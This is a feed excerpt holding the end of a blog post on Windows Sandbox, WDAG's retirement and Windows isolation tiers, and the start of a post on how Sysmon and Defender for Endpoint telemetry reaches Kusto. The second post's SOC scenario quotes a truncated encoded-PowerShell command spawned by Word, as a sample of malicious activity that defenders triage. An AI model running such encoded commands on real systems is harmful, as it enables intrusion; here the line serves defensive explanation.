&lt;h2&gt;7. Why Sandbox Survives&lt;/h2&gt;
&lt;p&gt;If the deprecation reasoning above is right, the natural question is why the &lt;em&gt;same&lt;/em&gt; substrate, allocated by &lt;em&gt;the same&lt;/em&gt; HCS API, in &lt;em&gt;the same&lt;/em&gt; kind of Hyper-V partition, survived as Windows Sandbox. The answer is that everything that made WDAG expensive maps to an operational advantage in Sandbox.&lt;/p&gt;
&lt;p&gt;The lifecycle is gesture-bound, not session-bound. The cost is paid by the user who explicitly asked for it, when they asked for it, and not before. The Sandbox install page [@learn-microsoft-com-sandbox-install] ships the feature disabled by default; turning it on costs the dynamic base image on disk and nothing on memory until launch.&lt;/p&gt;
&lt;p&gt;The substitute set is empty. For the &quot;run an untrusted executable once&quot; threat model, no in-process mitigation suite plays the role ESM plays for browsing. There is no in-AppContainer answer to &quot;I want to detonate &lt;code&gt;suspicious.exe&lt;/code&gt; and observe it&quot;; Smart App Control prevents execution rather than containing it; AppLocker policies refuse the run rather than sandboxing it. The use case Sandbox fills is what is &lt;em&gt;left over&lt;/em&gt; when prevention fails or is operationally unacceptable, and there is no cheaper way to fill it.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The &quot;run an untrusted executable&quot; threat model lacks a cheaper substitute, so Sandbox&apos;s Hyper-V partition cost is the floor. WDAG&apos;s &quot;render an untrusted website&quot; threat model gained a cheaper substitute (Edge ESM), so WDAG&apos;s same Hyper-V partition cost stopped being the floor and became the ceiling -- and was retired.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The integration surface is also far smaller. Sandbox exposes one launcher binary, one configuration file format, no policy engine, no clipboard direction policies (just on/off), no network zoning, no pre-warmed worker process, no host-side broker for an embedded browser. The host-side attack surface is correspondingly thin: a &lt;code&gt;.wsb&lt;/code&gt; parser, an HCS caller, a window-host process. Each WDAG-style integration bug class -- network-isolation evaluator, browser broker, document-routing logic -- has no analog.&lt;/p&gt;
&lt;p&gt;A useful contrast: the &lt;code&gt;isolatedapplauncher.h&lt;/code&gt; [@learn-microsoft-com-api-isolatedapplauncher] page exposes &lt;code&gt;IIsolatedAppLauncher&lt;/code&gt;, &lt;code&gt;IIsolatedProcessLauncher&lt;/code&gt;, &lt;code&gt;IsProcessInIsolatedContainer&lt;/code&gt;, and &lt;code&gt;IsProcessInWDAGContainer&lt;/code&gt;. That is the application surface of a feature that hosts third-party processes and lets them know they are inside it. Sandbox has nothing comparable, because no third-party application is supposed to ship with &quot;behave differently inside Sandbox&quot; logic. The guest is a fresh Windows install, the artifact is whatever the user dropped in, and the host does not need to expose an &quot;am I inside?&quot; predicate.&lt;/p&gt;
&lt;p&gt;Sandbox also benefits from the &lt;em&gt;negative space&lt;/em&gt; of the deprecation. The replacement stack (Edge ESM, Smart App Control, Defender network protection) collectively pushes the &lt;em&gt;unbearable&lt;/em&gt; workloads off the Hyper-V partition: the always-on browser, the heavyweight Office document host, the network-zone enforcer. What is left for Sandbox is the relatively small set of workloads where partition isolation is the right answer: malware triage, installer testing, one-off compatibility checks, isolated developer environments. The feature is now used closer to its design intent than it was in the WDAG era.This is the rare case where deprecating a sibling makes a feature &lt;em&gt;more&lt;/em&gt; aligned with its purpose. Before WDAG retirement, the question &quot;should this be in Sandbox or WDAG?&quot; had a complicated answer involving who you were and what you were doing. After 24H2, the question collapses: if you want a partition, you mean Sandbox.&lt;/p&gt;
&lt;h2&gt;8. The 2026 Isolation Stack&lt;/h2&gt;
&lt;p&gt;With WDAG gone, the post-24H2 Windows isolation taxonomy is best read as four orthogonal primitives, each answering a different question about an untrusted workload. None alone substitutes for WDAG&apos;s combined function; together they cover the ground WDAG used to. The tiers below are numbered for reference; the numbering does &lt;em&gt;not&lt;/em&gt; imply a single linear cost/strength axis. Process mitigations live &lt;em&gt;inside&lt;/em&gt; AppContainer-wrapped processes (they are not &quot;below&quot; AppContainer on a cost axis, they are within it), and admission primitives (Smart App Control, Defender network protection) are an orthogonal family that decides whether a binary or destination is allowed at all -- a question that runs before capability containment, not above or below it.&lt;/p&gt;

A mechanism that answers a specific question about how an untrusted workload is constrained. The four families that the 2026 Windows stack composes are: (1) *process-internal mitigations* that limit what a corrupted-memory exploit can do (ACG, CET, Edge ESM); (2) *capability sandboxes* that limit what a process can name and reach (AppContainer); (3) *admission policies* that decide whether a binary may run or a destination may be contacted at all (Smart App Control, Defender network protection); and (4) *kernel-partition boundaries* that put an entire second NT kernel between the workload and the user&apos;s data (Hyper-V VM). Each family has its own cost shape; only the kernel-partition boundary appears on the Microsoft Servicing Criteria for Windows [@microsoft-com-servicing-criteria] as a serviced security boundary.
&lt;h3&gt;Tier 1: Process mitigations (Edge ESM, ACG, CET)&lt;/h3&gt;
&lt;p&gt;The cheapest family runs the workload on the host kernel under a stricter set of process-level controls. Edge Enhanced Security Mode is the visible UI; the underlying primitives are the Hardware-enforced Stack Protection [@techcommunity-microsoft-com-p-2163340] (CET) and Arbitrary Code Guard [@learn-microsoft-com-protection-reference] (ACG) referenced from the browse-safer page [@learn-microsoft-com-browse-safer]. These mitigations apply &lt;em&gt;inside&lt;/em&gt; whatever container the binary already runs in -- an AppContainer-wrapped Edge renderer, or a non-AppContainer process -- and limit the privileges a corrupted-memory exploit can give itself. They are sufficient for the &lt;em&gt;vast majority&lt;/em&gt; of untrusted navigations after the JIT-disabling trade is made.&lt;/p&gt;
&lt;h3&gt;Tier 2: AppContainer (capability-bound sandbox)&lt;/h3&gt;
&lt;p&gt;The capability sandbox is the AppContainer [@learn-microsoft-com-appcontainer-isolation] primitive. The MSDN page enumerates the isolation slices under six section headings -- Credential isolation, Device isolation, File isolation, Network isolation, Process isolation, and Window isolation -- all enforced at the OS, none requiring a partition. AppContainer is the wrapper around Edge&apos;s renderer, around UWP apps, around modern app-isolation packages. It is the cheap container that scales to every process on the device. Inside an AppContainer, Tier 1 mitigations still apply; AppContainer constrains what the process can &lt;em&gt;name&lt;/em&gt;, Tier 1 constrains what a corrupted process can &lt;em&gt;do&lt;/em&gt;. They are complementary, not stacked.&lt;/p&gt;
&lt;h3&gt;Tier 3: Smart App Control + Defender network protection (policy at the OS edge)&lt;/h3&gt;
&lt;p&gt;Adjacent to the process tiers, the policy tier decides what binaries and what destinations are allowed at all. Smart App Control governs &lt;em&gt;what runs&lt;/em&gt;; Defender network protection governs &lt;em&gt;what the device talks to&lt;/em&gt;. These are not isolation primitives in the strict sense -- they are &lt;em&gt;admission&lt;/em&gt; primitives. They turn off the question before the partition has to answer it.&lt;/p&gt;
&lt;h3&gt;Tier 4: Hyper-V VM (Windows Sandbox, Windows Server Hyper-V isolation containers)&lt;/h3&gt;
&lt;p&gt;At the top of the cost curve sits the Hyper-V VM boundary -- the only tier whose worst-case escape pays the $250,000 bounty [@microsoft-com-hyper-v]. Windows Sandbox is the desktop face; Hyper-V isolation containers [@learn-microsoft-com-hyperv-container] on Windows Server (&quot;each container runs inside of a highly optimized virtual machine and effectively gets its own kernel&quot;) are the server face. The 2026 stack uses this tier sparingly, on user gesture, for workloads where the cheaper tiers are not enough.&lt;/p&gt;

flowchart TD
    T1[Tier 1: Process mitigations&lt;br /&gt;ACG, CET, Edge ESM]
    T2[Tier 2: AppContainer&lt;br /&gt;Capability-bound process sandbox]
    T3[Tier 3: Policy admission&lt;br /&gt;Smart App Control + Defender network protection]
    T4[Tier 4: Hyper-V VM&lt;br /&gt;Windows Sandbox / HV isolation containers]
    T1 ~~~ T2 ~~~ T3 ~~~ T4
    T1 -.-&amp;gt;|untrusted browsing| ESM2[Edge ESM]
    T2 -.-&amp;gt;|modern apps| UWP[UWP / packaged apps]
    T3 -.-&amp;gt;|admit/deny| SAC2[SAC + DNP]
    T4 -.-&amp;gt;|on-demand detonation| WS2[Windows Sandbox]
&lt;p&gt;The taxonomy is layered without being strictly linear. Read it as a four-question pipeline rather than a four-rung ladder. Tier 3 (Smart App Control + Defender network protection) decides &lt;em&gt;what runs and what the device talks to&lt;/em&gt; -- admission, not containment. Whatever Tier 3 admits then lands inside Tier 2 (AppContainer), which constrains the binary&apos;s &lt;em&gt;capabilities&lt;/em&gt; -- file, network, device, window, credential, and process scope. Inside that AppContainer-wrapped process, Tier 1 (ACG, CET, Edge ESM) applies &lt;em&gt;process-internal&lt;/em&gt; mitigations that limit what a corrupted-memory exploit can do. Tier 4 (Hyper-V VM) is the last-resort &lt;em&gt;kernel&lt;/em&gt; boundary: when the workload is hostile enough that the host kernel itself must be assumed reachable from the renderer, Windows Sandbox or a Hyper-V isolation container puts an entire NT kernel between the artifact and the user&apos;s data. WDAG used to plug a session-bound, transparent variant of Tier 4 underneath every Edge navigation; once Tier 1 hardening (ACG, CET, ESM) closed the marginal-security gap on the &lt;em&gt;typical&lt;/em&gt; navigation, that session-bound Tier 4 paid more than it saved, and was deleted.&lt;/p&gt;
&lt;h2&gt;9. Engineering Takeaways&lt;/h2&gt;
&lt;p&gt;A few rules of thumb fall out of the architectural comparison.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Use the lowest tier whose boundary you actually need.&lt;/strong&gt; If your threat is &quot;this binary may try to escape the renderer,&quot; AppContainer + process mitigations suffice. If your threat is &quot;this binary may try to escape the kernel,&quot; you need a Hyper-V partition; that means Sandbox or, for production, an isolation container. The Microsoft Servicing Criteria for Windows [@microsoft-com-servicing-criteria] lists which boundaries Microsoft commits to defending; anything not on that list is best treated as a depth-in-defense layer, not a primary boundary.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Disable shared channels first; renegotiate them only when forced.&lt;/strong&gt; The default &lt;code&gt;.wsb&lt;/code&gt;-less Sandbox enables networking and clipboard redirection -- per the configuration docs [@learn-microsoft-com-wsb-file], enabled networking &quot;can expose untrusted applications to the internal network.&quot; For malware triage, build the paranoid &lt;code&gt;.wsb&lt;/code&gt; from the snippet in section 2 and only loosen it when a specific analysis step requires it.&lt;/p&gt;
&lt;p&gt;{`
// A naive but useful decision tree. Print the recommended tier for a workload.
function pickTier(workload) {
  const w = workload.toLowerCase();
  if (w.includes(&quot;untrusted exe&quot;) || w.includes(&quot;malware&quot;)) {
    return &quot;Tier 4: Windows Sandbox (on-demand, gesture-bound)&quot;;
  }
  if (w.includes(&quot;untrusted website&quot;) || w.includes(&quot;unfamiliar site&quot;)) {
    return &quot;Tier 1: Edge Enhanced Security Mode + Tier 3: Defender network protection&quot;;
  }
  if (w.includes(&quot;untrusted document&quot;) || w.includes(&quot;office&quot;)) {
    return &quot;Tier 3: Smart App Control + Office Protected View&quot;;
  }
  if (w.includes(&quot;third-party app&quot;) || w.includes(&quot;uwp&quot;)) {
    return &quot;Tier 2: AppContainer&quot;;
  }
  return &quot;Default: ship the workload under Tier 2 AppContainer; escalate if the threat model justifies it.&quot;;
}&lt;/p&gt;
&lt;p&gt;[
  &quot;Detonate untrusted exe from email&quot;,
  &quot;Open an unfamiliar site for research&quot;,
  &quot;Open an untrusted Office document&quot;,
  &quot;Run a third-party packaged app&quot;
].forEach(w =&amp;gt; console.log(w + &quot;  -&amp;gt;  &quot; + pickTier(w)));
`}&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Avoid features whose own boundary is not a serviced boundary.&lt;/strong&gt; A useful litmus test is to read the Microsoft Security Servicing Criteria for Windows [@microsoft-com-servicing-criteria] and ask whether the feature&apos;s own claimed isolation appears there. WDAG didn&apos;t; Hyper-V VM did. Designs that rely on a non-serviced isolation are more brittle, both technically (no bounty pressure on the boundary) and operationally (no commitment to fix integration bugs out-of-band).&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Plan for deprecation of integration features, not of primitives.&lt;/strong&gt; Microsoft retired WDAG; it did not retire HCS, Hyper-V isolation containers, or AppContainer. The primitives outlast the productizations. A codebase that depends on the primitives (calling HCS directly, wrapping a workload in AppContainer) is more durable than one that depends on a packaged feature (calling &lt;code&gt;IIsolatedAppLauncher&lt;/code&gt;, relying on Network Isolation policy semantics) whose lifecycle is set by product economics.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Workloads that traverse a Sandbox boundary leave specific telemetry. The host event log records &lt;code&gt;Containers-DisposableClientVM&lt;/code&gt; start/stop events; HCS partition allocations are visible to ETW; mapped-folder access from inside the guest crosses a brokered channel that surfaces in host file-system filters. If an incident response playbook expects to see &quot;Hyper-V partition created&quot; or &quot;container-disposable-client-vm started,&quot; those are the canonical signals from the substrate, not from Sandbox-specific telemetry.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;10. Open Problems and Future Direction&lt;/h2&gt;
&lt;p&gt;The 2026 stack is good. It is not finished. Several open problems remain visible at the seams.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Transparent, gesture-priced isolation.&lt;/strong&gt; WDAG&apos;s session-bound model failed; Sandbox&apos;s gesture-bound model is too explicit for everyday use. There is no current Windows feature that combines (a) automatic, policy-driven launch (&quot;this URL is outside the trust zone, isolate it&quot;), (b) Sandbox-style on-demand allocation, and (c) sub-second cold start. Each pair of those three is achievable -- WDAG had (a) and (b) but not (c); Sandbox has (b) and (c) but not (a); ESM has (a) and (c) but gives up the partition boundary. Closing all three simultaneously is the standing open problem.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Hardware-rooted attestation of the partition.&lt;/strong&gt; Today&apos;s Hyper-V partition is anchored by VBS, which is anchored by Secure Boot, which is anchored by the platform firmware. Microsoft Pluton [@learn-microsoft-com-security-processor] -- &quot;a secure crypto-processor built into the CPU... designed to provide the functionality of the Trusted Platform Module (TPM) and deliver other security functionality beyond what is possible with the TPM 2.0 specification&quot; -- raises the floor on what a guest can attest about, opening a path to confidential-VM-style guarantees on the client. The shape of that integration with Sandbox is not yet public.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Confidential client VMs.&lt;/strong&gt; On the server, Azure confidential VMs [@learn-microsoft-com-vm-overview] provide a &quot;hardware-enforced boundary between your application and the virtualization stack&quot; via AMD SEV-SNP and Intel TDX, with &quot;secure key release with cryptographic binding between the platform&apos;s successful attestation and the VM&apos;s encryption keys.&quot; Whether that boundary -- guest memory unreadable by the host kernel -- ever shows up under client Windows Sandbox or Hyper-V is an open architectural question. If it does, it changes the Hyper-V VM threat model: a malicious &lt;em&gt;host&lt;/em&gt; (or compromised host kernel) could no longer read guest memory, which would close a category of risk that currently sits outside the bounty scope.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;AI-agent action containment.&lt;/strong&gt; WDAG&apos;s specific shape -- a session-bound partition that transparently absorbed risky actions on behalf of a user -- is suggestive of an emerging problem: containing the actions of AI agents that take tool-using steps inside a user&apos;s session. Today&apos;s stack does not have a feature shaped quite like this. Sandbox is too explicit; AppContainer is too process-bound; ESM is browser-only; Smart App Control is admit/deny, not contain/observe. An &quot;AI-agent action sandbox&quot; would need WDAG&apos;s transparency without WDAG&apos;s resident-per-employee cost. The architectural question is whether the lessons of WDAG&apos;s retirement should make the next attempt look like Sandbox-with-a-policy-trigger or like AppContainer-with-a-stronger-boundary.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Shared-microarchitectural-state side channels.&lt;/strong&gt; The Hyper-V VM boundary is a logical boundary. The CPU caches, branch predictors, and prefetch units are still shared with the host. Spectre-class side channels survive partition boundaries and survive confidential-VM boundaries; the canonical Meltdown/Spectre disclosure [@meltdownattack-com] frames the primitive as a class of transient-execution attacks against the shared microarchitectural state itself, and Microsoft&apos;s KB4072698 guidance for speculative-execution side-channel vulnerabilities [@support-microsoft-com-b632-0d96f30c8c8e] catalogs a long succession of advisories (ADV180002, ADV180012, ADV180018 L1TF, ADV190013 MDS, ADV220002 MMIO Stale Data, CVE-2022-23825 Branch Type Confusion, CVE-2022-0001 Branch History Injection, CVE-2023-20569 AMD Return Address Predictor) that each required Hyper-V-host mitigation to keep the partition boundary effective. Mitigations close &lt;em&gt;known&lt;/em&gt; variants at the cost of performance, but the underlying primitive -- one core, two security domains -- does not change. The ideal sandbox -- sub-second cold start, single-digit-MB resident overhead, transparent policy launch, &lt;em&gt;and&lt;/em&gt; a partition boundary that closes all microarchitectural channels -- remains unachievable on shared silicon. This is not a Windows-specific problem; it is the lower bound on what any client-side sandbox can deliver.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The 2026 isolation stack is the right shape for the threats it was designed against: a malicious binary, an unfamiliar website, an untrusted document, a third-party app. It is not yet shaped for the threats that will dominate 2027 and beyond: confidential client compute, agent action containment, hardware-rooted attestation. Watching where the next partition-shaped primitive appears -- or fails to -- is how the architecture will continue to evolve.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr /&gt;
&lt;p&gt;Windows Sandbox and WDAG are the cleanest natural experiment Windows has run on Hyper-V isolation as a product. Same substrate, same partition primitive, same bounty-protected boundary; opposite lifecycle bindings, opposite threat models, opposite outcomes. The substrate survives because the substrate is the boundary; the productizations come and go because they are bets on how to spend that boundary&apos;s budget. WDAG bet on session-bound transparency and lost to a cheaper process-mitigation stack; Sandbox bet on gesture-bound disposability and remains the right answer for the workload it was designed for. The story is less about Hyper-V and more about lifecycle: when you allocate isolation matters as much as how much isolation you allocate.&lt;/p&gt;
</content:encoded><category>windows-security</category><category>hyper-v</category><category>sandbox</category><category>application-guard</category><category>isolation</category><category>hcs-api</category><category>vbs</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>From `cmd.exe` to a Kusto Row in 90 Seconds: How Sysmon and Defender for Endpoint Actually Work</title><link>https://paragmali.com/blog/from-cmdexe-to-a-kusto-row-in-90-seconds-how-sysmon-and-defe/</link><guid isPermaLink="true">https://paragmali.com/blog/from-cmdexe-to-a-kusto-row-in-90-seconds-how-sysmon-and-defe/</guid><description>The seven-layer production EDR pipeline -- kernel callback, ETW publisher, MsSense.exe, SenseCncProxy, Kusto, KQL -- traced end to end for Sysmon and Defender for Endpoint.</description><pubDate>Wed, 13 May 2026 00:00:00 GMT</pubDate><content:encoded>
Modern Windows EDR is a seven-layer production pipeline. A kernel callback fires, a user-mode aggregator labels the event, an ETW publisher (Sysmon) or a TLS-pinned cloud forwarder (`SenseCncProxy.exe`) ships it, and within seconds the event surfaces as a row in a Kusto table that the analyst queries with KQL. Sysmon (Russinovich and Garnier, August 2014) is the configurable kernel-callback-then-publish reference: twenty-nine event IDs, three canonical configurations (SwiftOnSecurity, the post-rename `NextronSystems/sysmon-config`, and `olafhartong/sysmon-modular`), Antimalware-PPL hardening since v15 in June 2023. Microsoft Defender for Endpoint (Windows Defender ATP preview March 2016, MDE rename September 2020, Microsoft Defender XDR portal late 2023) is the commercial cloud-correlated counterpart: `MsSense.exe` runs as Antimalware-PPL, shares the `WdFilter.sys` / `WdBoot.sys` / `WdNisDrv.sys` Defender Antivirus kernel surface, and lands events in six `Device*` Advanced Hunting tables with 30-day in-portal retention, extended via the Microsoft Sentinel Defender XDR connector. For MDE-licensed shops with a detection-engineering team, the community pattern is Hartong&apos;s `sysmonconfig-mde-augment.xml` -- Sysmon as a complement, not a duplicate. The pipeline&apos;s four structural ceilings (pre-driver-load horizon, observation-vs-enforcement latency, MDE schema truncation, kernel-mode adversary primitive) are documented and unclosed; FalconForce&apos;s 2022 CVE-2022-23278 disclosure and InfoGuard Labs&apos; 2025 certificate-pinning bypass bookend an adversarial arc the field has not yet ended.
&lt;h2&gt;1. From &lt;code&gt;cmd.exe&lt;/code&gt; to a Kusto Row in Ninety Seconds&lt;/h2&gt;
&lt;p&gt;At 9:14 a.m. on a Monday, a SOC analyst named Maya watches a &lt;code&gt;DeviceProcessEvents&lt;/code&gt; row light up in the Advanced Hunting console of Microsoft Defender XDR. The &lt;code&gt;FileName&lt;/code&gt; is &lt;code&gt;powershell.exe&lt;/code&gt;. The &lt;code&gt;ProcessCommandLine&lt;/code&gt; reads &lt;code&gt;powershell.exe -enc JABzAD0A...&lt;/code&gt;. The &lt;code&gt;InitiatingProcessFileName&lt;/code&gt; is &lt;code&gt;WINWORD.EXE&lt;/code&gt;. The &lt;code&gt;Timestamp&lt;/code&gt; is three seconds ago [@deviceprocessevents-table].&lt;/p&gt;
&lt;p&gt;By 9:15:44 Maya has pivoted to &lt;code&gt;DeviceNetworkEvents&lt;/code&gt;, found an outbound connection from the same &lt;code&gt;InitiatingProcessId&lt;/code&gt; to a previously-unknown IP on TCP/443, clicked &lt;strong&gt;Isolate device&lt;/strong&gt; in the device page, and the endpoint is off the network. Ninety seconds, end to end. Email triage of the original message; a quarantine on the inbound &lt;code&gt;.docm&lt;/code&gt;; and -- by the time the user&apos;s coffee has cooled -- a brand-new IOC in the tenant&apos;s custom indicator list.&lt;/p&gt;
&lt;p&gt;This article is the rewind. We walk Maya&apos;s ninety seconds backwards through the seven pipeline layers that made the triage possible -- starting in ring zero, ending in the KQL query you can copy into your own tenant -- and along the way we answer the question every SOC manager has asked at least once: do we deploy Sysmon alongside Defender for Endpoint, or trust Defender alone?&lt;/p&gt;
&lt;h3&gt;The seven layers&lt;/h3&gt;
&lt;p&gt;Maya is looking at a single Kusto row. Behind that row sit seven distinct software components, each of which can fail independently:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;A &lt;strong&gt;kernel callback&lt;/strong&gt; fired inside the &lt;code&gt;nt!PspInsertProcess&lt;/code&gt; path on the target machine the instant &lt;code&gt;WINWORD.EXE&lt;/code&gt; called &lt;code&gt;CreateProcessW&lt;/code&gt; to spawn &lt;code&gt;powershell.exe&lt;/code&gt;. The callback handler lives inside &lt;code&gt;WdFilter.sys&lt;/code&gt; (Defender Antivirus&apos;s filter driver) and inside &lt;code&gt;SysmonDrv.sys&lt;/code&gt; if Sysmon is also installed [@pssetcreateex-msdn].&lt;/li&gt;
&lt;li&gt;A &lt;strong&gt;user-mode aggregator&lt;/strong&gt; -- &lt;code&gt;MsSense.exe&lt;/code&gt; for Defender for Endpoint, or &lt;code&gt;Sysmon.exe&lt;/code&gt; (the service) for Sysmon -- received the structured callback notification, enriched it with parent-process state, file hashes, signature information, and identity data, and decided whether the event was worth shipping [@mde-ms-learn][@sysmon-ms-learn].&lt;/li&gt;
&lt;li&gt;An &lt;strong&gt;&lt;a href=&quot;https://paragmali.com/blog/etw-how-windows-2000s-performance-hack-became-the-edr-substr/&quot; rel=&quot;noopener&quot;&gt;ETW publisher&lt;/a&gt;&lt;/strong&gt; -- in Sysmon&apos;s case the &lt;code&gt;Microsoft-Windows-Sysmon&lt;/code&gt; provider -- emitted the event to the operating system&apos;s tracing bus, and the Sysmon service wrote it to the &lt;code&gt;Microsoft/Windows/Sysmon/Operational&lt;/code&gt; event log [@sysmon-ms-learn].&lt;/li&gt;
&lt;li&gt;A &lt;strong&gt;cloud forwarder&lt;/strong&gt; -- &lt;code&gt;SenseCncProxy.exe&lt;/code&gt; -- ran the Defender payload through TLS with certificate pinning out to the regional Defender XDR ingest endpoint [@falconforce-2022].&lt;/li&gt;
&lt;li&gt;A &lt;strong&gt;cloud sensor pipeline&lt;/strong&gt; in Microsoft&apos;s regional datacenter (the US for US tenants, the EU for European tenants, the UK for UK tenants) wrote the event into the Advanced Hunting Kusto cluster [@advanced-hunting-overview][@ms-server-endpoints-learn].&lt;/li&gt;
&lt;li&gt;A &lt;strong&gt;Kusto table&lt;/strong&gt; -- &lt;code&gt;DeviceProcessEvents&lt;/code&gt; -- became queryable within seconds, joined logically across roughly fifty columns to its siblings (&lt;code&gt;DeviceNetworkEvents&lt;/code&gt;, &lt;code&gt;DeviceFileEvents&lt;/code&gt;, &lt;code&gt;DeviceRegistryEvents&lt;/code&gt;, &lt;code&gt;DeviceImageLoadEvents&lt;/code&gt;, &lt;code&gt;DeviceEvents&lt;/code&gt;) [@deviceprocessevents-table].&lt;/li&gt;
&lt;li&gt;A &lt;strong&gt;KQL query&lt;/strong&gt; Maya wrote, or one of Microsoft&apos;s built-in detection rules, joined the process row to the network row on &lt;code&gt;(DeviceId, InitiatingProcessId)&lt;/code&gt;, surfaced the C2 callback inside a ninety-second window, and put the device-isolation button on her screen [@advanced-hunting-overview][@sentinel-xdr-connector].&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Each of these seven layers is independently failure-prone. Operating an EDR well -- which is what this article is about -- means knowing which layer produced which artifact, which layer can be tampered with, and which layer is the right one to fix when the row does not arrive.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Modern Windows EDR is a seven-layer production pipeline: kernel callback, user-mode aggregator, ETW publisher (or cloud forwarder), TLS-pinned cloud transport, regional Kusto ingest, table write, KQL read. Sysmon and Microsoft Defender for Endpoint are two implementations of the same seven layers, with different design philosophies at every layer.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;Why two products, not one&lt;/h3&gt;
&lt;p&gt;Sysmon and Defender for Endpoint were not designed as a pair. They evolved as competing answers to the same problem -- &lt;em&gt;when prevention fails, what evidence do you give the responder?&lt;/em&gt; -- on the same operating system, with the same kernel-callback APIs underneath, and with the same Windows Event Tracing bus as the transport layer in the middle. They converged on a shared trust model only in 2023, when both products began running as protected processes [@sysmon-ms-learn][@falconforce-2022].&lt;/p&gt;
&lt;p&gt;That convergence is not coincidence. It is the consequence of a decade of architectural pressure pushing both products toward the same answer: collect at the Microsoft-sanctioned kernel-callback boundary, normalize in user mode, ship over a tamper-resistant transport, and surface to the analyst as a queryable column family. The differences are in the configuration grammar, the cloud-side enrichment, and the trust boundary at the publisher edge. The seven layers are the same. To see why, we have to start in 2014, when Sysmon shipped with three event types.&lt;/p&gt;
&lt;h2&gt;2. Twelve Years, Two Arcs, One Convergence&lt;/h2&gt;
&lt;p&gt;Anton Chuvakin, then a research VP at Gartner, named the category in July 2013. His blog post -- preserved on his personal site after Gartner deleted its analyst blogs in late 2023 -- coined the term &lt;em&gt;Endpoint Threat Detection and Response&lt;/em&gt; (ETDR) and defined it as &quot;tools primarily focused on detecting and investigating suspicious activities (and traces of such) other problems on hosts/endpoints&quot; [@chuvakin-2013][@wikipedia-edr]. The &quot;T&quot; dropped out of the acronym within eighteen months and the field has been called EDR ever since.&lt;/p&gt;
&lt;p&gt;Chuvakin&apos;s question -- &lt;em&gt;what evidence do you give the responder when prevention fails?&lt;/em&gt; -- got two different answers from inside Microsoft over the next decade. One was free, configurable, and ran on every Windows machine the operator wanted to run it on. The other was commercial, cloud-correlated, and only worked if you paid for it. Both started in the same place: at the supported kernel-callback boundary that Microsoft had been steadily building out since Windows XP.&lt;/p&gt;
&lt;h3&gt;The Sysmon arc: August 2014 to March 2026&lt;/h3&gt;
&lt;p&gt;Mark Russinovich gave session HTA-T07R at RSA US 2014 -- &lt;em&gt;Malware Hunting with the Sysinternals Tools&lt;/em&gt; -- and the methodology he taught (process-tree pivoting, autoruns enumeration, real-time monitoring of file and registry writes) had a natural conclusion: somebody should ship a Sysinternals tool that did all of that, continuously, into the Windows event log [@russinovich-rsa-2014]. The tool shipped in August 2014, written by Russinovich and Thomas Garnier, also of Microsoft. ZDNet&apos;s contemporaneous coverage captured the introduction: &quot;Sysmon, written by Russinovich and Thomas Garnier, also of Microsoft, is the 73rd tool in the set... Note: For public release, Sysmon has been reset to version 1.00&quot; [@zdnet-sysmon-2014]. The launch SKU had three event types: process create (EID 1), file-create-time change (EID 2), and network connect (EID 3).&lt;/p&gt;
&lt;p&gt;The design philosophy is captured in a single sentence Microsoft Learn still prints on the Sysmon download page -- a sentence whose framing of Sysmon as a publisher that refuses to do detection and refuses to hide is the entire foundation of the SwiftOnSecurity-NextronSystems-Hartong configuration lineage that §5 unpacks; the verbatim quote lands as the §4 PullQuote [@sysmon-ms-learn]. Every detection-engineering corpus in the Windows field -- SwiftOnSecurity&apos;s config, Florian Roth&apos;s fork, Olaf Hartong&apos;s modular system, the SigmaHQ rule base, the Threat Hunter Playbook -- is downstream of that one design choice.&lt;/p&gt;
&lt;p&gt;The version history reads as capability accretion, not architectural change. Sysmon v6 in February 2017 added registry events (EIDs 12-14), process-access (10), file-create (11), pipe events (17-18), file-create-stream-hash (15), and the &lt;em&gt;ServiceConfigurationChange&lt;/em&gt; (16) audit of Sysmon&apos;s own settings [@sysinternals-blog-v6]. (EID 7 ImageLoad arrived earlier, in Sysmon v2.0 -- the §4 catalogue places it correctly.) Sysmon v10 in June 2019 added DNS-query observation via ETW &lt;em&gt;consumption&lt;/em&gt; of &lt;code&gt;Microsoft-Windows-DNS-Client&lt;/code&gt;; the v10 release date is recorded in the community-curated &lt;em&gt;Sysmon Version History&lt;/em&gt; repository, explicitly marked &quot;Outdated&quot; past v11.10 because its maintainer stopped updating it [@sysmon-version-history]. v13 added ClipboardChange and ProcessTampering. v14 in August 2022 added the first &lt;em&gt;preventive&lt;/em&gt; event -- FileBlockExecutable (EID 27) -- making Sysmon something subtly more than a publisher [@diversenok-2022][@hartong-sysmon14-medium].&lt;/p&gt;
